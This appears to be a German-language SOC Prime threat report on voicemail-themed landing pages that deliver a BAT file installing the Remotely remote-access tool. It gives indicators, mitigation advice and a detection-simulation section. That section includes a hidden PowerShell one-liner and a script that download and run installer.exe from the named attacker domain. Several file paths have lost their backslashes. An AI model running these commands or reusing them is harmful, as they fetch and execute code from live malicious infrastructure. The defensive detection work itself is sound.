SOC Prime Bias: Mittel

06 Feb 2026 16:41 UTC

Voicemail-Falle: Deutschsprachige Voicemail-Lockvögel führen zu Fernzugriff

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Voicemail-Falle: Deutschsprachige Voicemail-Lockvögel führen zu Fernzugriff
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Bedrohungsakteure hosten deutschsprachige „Voicemail“-Landingpages, die Benutzer dazu verleiten, eine BAT-Datei herunterzuladen. Das Skript spielt ein harmloses Audio als Ablenkung ab, während es im Hintergrund das legitime Fernüberwachungswerkzeug Remotely installiert. Sobald der RMM-Agent bereitgestellt ist, erhält der Angreifer durch die vom Angreifer kontrollierte C2-Infrastruktur einen persistenten Fernzugriff.

Untersuchung

Censys identifizierte 86 kompromittierte Web-Eigenschaften auf *.cadillac.ps-Domains, die die schädliche BAT-Datei verbreiten. Das Skript ruft einen auf remotely.billbutterworth.com gehosteten PowerShell-Installer auf, der ein Remotely ZIP-Paket herunterlädt. Das Archiv enthält die Remotely-Agent-Komponenten und einen Dienst, der unter C:Program FilesRemotely installiert wird.

Minderung

Blockieren Sie *.cadillac.ps-Domains und remotely.billbutterworth.com auf der DNS/Proxy-Ebene. Schulen Sie Benutzer, keine unerwarteten BAT-Dateien auszuführen oder PowerShell-Befehle von unbekannten Webseiten zu kopieren/einzufügen. Implementieren Sie Endpunktkontrollen, um die Erstellung von Remotely-Diensten und verdächtige Installationspfade oder nicht signierte Werkzeuge zu erkennen.

Reaktion

Alarmieren Sie bei der Erstellung von Remotely_Service und dem Vorhandensein von Remotely_Agent.exe unter Program Files. Suchen Sie nach voicemail.bat und der zugehörigen PowerShell-Installationsaktivität. Isolieren Sie betroffene Hosts, sammeln Sie forensische Artefakte und rotieren/widerrufen Sie alle vom RMM-Agenten verwendeten Anmeldedaten oder Tokens.

Angriffsablauf

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien-Vorflugcheck muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die dazu entwickelt wurde, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die exakt erwartete Telemetrie zu generieren, die der Erkennungslogik entspricht. Abstrakte oder unrelevante Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:

    1. Phishing-Auslieferung: Der Angreifer sendet eine E-Mail mit einem deutschsprachigen Voicemail-Köder-Anhang (HTML), die, wenn geöffnet, das Opfer umleitet zu http://bannerbank.cadillac.ps/voicemail.html.
    2. Ausführung der Zielseite: Die Zielseite hostet einen schädlichen PowerShell-Einzeiler, der ein Remote-Management-Werkzeug (RMM) installiert und ausführt.
    3. Prozesserstellung: Wenn der Browser des Opfers die Seite verarbeitet, wird PowerShell mit einer Befehlszeile aufgerufen, die explizit die beiden Zeichenketten enthält, nach denen die Regel sucht.
    4. Ergebnisende Telemetrie: Windows protokolliert Ereignis-ID 4688 mit einer Befehlszeile die sowohl „voicemail-bezogene Landingpage“ and „bannerbank.cadillac.ps“enthält, wodurch die Sigma-Bedingung erfüllt wird.

    Der exakte Befehl, der für die Simulation verwendet wurde:

    # Simulierte bösartige Ausführung – enthält beide Auslösezeichenfolgen
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'voicemail-bezogene Landingpage'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`""
  • Regressionstest-Skript: Ein eigenständiges PowerShell-Skript, das den Angriff reproduziert und auf jedem Windows-Rechner mit aktivierter Protokollierung ausgeführt werden kann.

    <#
    .SYNOPSIS
        Simuliert den deutschen Voicemail-Köder, der die Sigma-Erkennungsregel auslöst.
    .DESCRIPTION
        Führt eine PowerShell-Befehlszeile aus, die beide erforderlichen Teilstrings enthält.
    #>
    
    # Definiere schadhafte Zeichenfolgen
    $lureText = "voicemail-bezogene Landingpage"
    $maliciousDomain = "bannerbank.cadillac.ps"
    
    # Erstelle den Einzeiler, der in der Befehlszeile erscheinen wird
    $payload = @"
    Write-Host '$lureText';
    Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe;
    Start-Process $env:TEMPinstaller.exe
    "@
    
    # Starte PowerShell mit der vorbereiteten Befehlszeile
    $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`""
    Write-Host "Starte bösartigen PowerShell-Befehl..."
    Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru
    
    # Optional: warte ein paar Sekunden, um die Protokollierung sicherzustellen
    Start-Sleep -Seconds 5
  • Aufräumbefehle: Entfernen Sie den heruntergeladenen Installer und alle Restprozesse.

    # Stoppe alle verbliebenen Installer-Prozesse
    Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Lösche die temporäre Installer-Datei
    $installerPath = "$env:TEMPinstaller.exe"
    if (Test-Path $installerPath) {
        Remove-Item $installerPath -Force
        Write-Host "Bereinigt $installerPath"
    }